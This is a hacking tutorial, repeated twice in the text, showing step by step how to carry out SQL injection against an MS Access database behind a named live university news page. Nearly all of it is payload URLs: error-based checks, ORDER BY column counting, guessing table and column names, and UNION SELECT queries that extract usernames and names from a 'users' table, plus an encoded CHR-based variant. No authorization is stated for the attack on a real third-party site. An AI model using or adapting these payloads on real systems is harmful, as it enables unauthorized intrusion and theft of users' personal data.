Here I will show you how to perform SQL injection against MSACCESS database :)
As we know MS_ACCESS have no information_schema so we have to brute force almost everything :p
same like Mysql<=4 :)
For better understanding , I am gonna perform injection on live site *_*
Here we goes ,
SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
lets check its false positive or not,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_* )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (Error)
Error is something like below image :)
Its integer based, lets start injection now ;)
Lets Find number of columns by simple order by statement,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
.
.
.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)
so here number of columns are 6 :)
we cant use union select statement unless we know at least one table_name.
Lets find Table_name First. As I already mentioned MS_ACCESS have no information_schema, so we have to guess Table names here is your Query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii] and 1=1
here is your result as "hii" is not a valid table_name :)
Now replace a "hii" with some common table names,
I highly recommended you to use some automated tools or script to do this, because its some what annoying process. :/ & time consuming too . I had written python script for this , I will publish it soon ;)
For now lets do it manually ;
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin] and 1=1
...................... ( ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user] and 1=1 ............................(ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users] and 1=1 .......... ( BINGO!!!!!! NO ERROR) *_*
So, its indicate that table "users" exists in the database :)
Same procedure we can follow to find columns, here is our Query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
now replace "hii" with different column_names, & repeat whole procedure again hope you understand :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12and 0<=(select count([id]) from [users]) and 1=1
.............( NO ERROR)
after spending a lot time on column names I found " id , name,email " as a columns for table "users"
NOW LETS DO IT UNION BASED,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
............................(HERE WE MUST HAVE TO MENTION THE TABLE NAME )
here we got vulnerable column 2.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
Lets extract some data from table "user" where columns names are " id, name, & email, username " ;)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users
Once I posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections"
I got a different solutions from Others, m gonna share one of it with you..
Thanx to Janus Slovan for his solution, :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users
Thanx for reading , I hope you like it. pls do share & feel free to askanything about tutorial . :)
Give some suggestions to Improve this tutorial :)
Thank you all ..............
As we know MS_ACCESS have no information_schema so we have to brute force almost everything :p
same like Mysql<=4 :)
For better understanding , I am gonna perform injection on live site *_*
Here we goes ,
SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
lets check its false positive or not,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_* )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (Error)
Error is something like below image :)
Lets Find number of columns by simple order by statement,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
.
.
.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)
so here number of columns are 6 :)
we cant use union select statement unless we know at least one table_name.
Lets find Table_name First. As I already mentioned MS_ACCESS have no information_schema, so we have to guess Table names here is your Query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii] and 1=1
here is your result as "hii" is not a valid table_name :)
Now replace a "hii" with some common table names,
I highly recommended you to use some automated tools or script to do this, because its some what annoying process. :/ & time consuming too . I had written python script for this , I will publish it soon ;)
For now lets do it manually ;
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin] and 1=1
...................... ( ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user] and 1=1 ............................(ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users] and 1=1 .......... ( BINGO!!!!!! NO ERROR) *_*
So, its indicate that table "users" exists in the database :)
Same procedure we can follow to find columns, here is our Query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
now replace "hii" with different column_names, & repeat whole procedure again hope you understand :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12and 0<=(select count([id]) from [users]) and 1=1
.............( NO ERROR)
after spending a lot time on column names I found " id , name,email " as a columns for table "users"
NOW LETS DO IT UNION BASED,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
............................(HERE WE MUST HAVE TO MENTION THE TABLE NAME )
here we got vulnerable column 2.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
Lets extract some data from table "user" where columns names are " id, name, & email, username " ;)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users
Once I posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections"
I got a different solutions from Others, m gonna share one of it with you..
Thanx to Janus Slovan for his solution, :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users
Thanx for reading , I hope you like it. pls do share & feel free to askanything about tutorial . :)
Give some suggestions to Improve this tutorial :)
Thank you all ..............
EmoticonEmoticon